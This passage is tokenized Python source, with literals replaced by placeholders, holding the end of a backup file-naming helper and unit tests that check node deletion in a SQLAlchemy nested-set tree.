generate_unique_name ( backup_dir , environment , name ) <EOL> shutil . move ( zipf . filename , unique_file_path ) <EOL> def generate_unique_name ( backup_dir , environemnt , name_prefix ) : <EOL> if name_prefix and name_prefix != '<STR_LIT>' : <EOL> name_base = name_prefix <EOL> else : <EOL> name_base = environemnt [ '<STR_LIT>' ] <EOL> name_attempt = "<STR_LIT>" . format ( name_base , datetime . utcnow ( ) . strftime ( "<STR_LIT>" ) ) <EOL> name_attempt_full_path = os . path . join ( backup_dir , name_attempt ) <EOL> if not os . path . 
exists ( name_attempt_full_path ) : <EOL> return name_attempt_full_path <EOL> else : <EOL> counter = <NUM_LIT:1> <EOL> while True : <EOL> counter += <NUM_LIT:1> <EOL> name_attempt = "<STR_LIT>" . format ( name_base , <EOL> datetime . utcnow ( ) . strftime ( "<STR_LIT>" ) , counter ) <EOL> name_attempt_full_path = os . path . join ( backup_dir , name_attempt ) <EOL> if os . path . exists ( name_attempt_full_path ) : <EOL> continue <EOL> else : <EOL> return name_attempt_full_path </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , with_statement , unicode_literals <EOL> from . helper import unittest , db , Named , get_tree_details <EOL> from . Named import NamedTestCase <EOL> class DeletionTestCase ( NamedTestCase ) : <EOL> def _delete_helper ( self , name , result ) : <EOL> node = db . session . query ( Named ) . filter_by ( name = name ) . one ( ) <EOL> db . session . delete ( node ) <EOL> db . session . commit ( ) <EOL> self . assertEqual ( get_tree_details ( ) , result ) <EOL> def test_del_root1 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:8> , 
'<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child11 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> 
} , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . 
_delete_helper ( name , result ) <EOL> def test_del_child12 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , 
'<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child13 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:20> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:4> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { 
'<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:11> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_root2 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : 
<NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:10> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . 
_delete_helper ( name , result ) <EOL> def test_del_child21 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:5> , '<STR_LIT:right>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:2> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:8> , '<STR_LIT:right>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:10> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , 
'<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child211 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:3> , '<STR_LIT:right>' : <NUM_LIT:12> , '<STR_LIT>' : <NUM_LIT:2> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:3> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:3> } , [ <EOL> ( u"<STR_LIT>" , { 
'<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:7> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:9> , '<STR_LIT:right>' : <NUM_LIT:10> , '<STR_LIT>' : <NUM_LIT:4> } , [ ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT> , '<STR_LIT:right>' : <NUM_LIT:15> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:16> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:0> } , [ ] ) , <EOL> ] <EOL> self . _delete_helper ( name , result ) <EOL> def test_del_child212 ( self ) : <EOL> name = u"<STR_LIT>" <EOL> result = [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT:3> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:4> , '<STR_LIT:right>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:left>' : <NUM_LIT:6> , '<STR_LIT:right>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:1> } , [ ] ) , <EOL> ] ) , <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:1> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:0> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : <NUM_LIT:2> , '<STR_LIT:right>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> } , [ <EOL> ( u"<STR_LIT>" , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:left>' : 
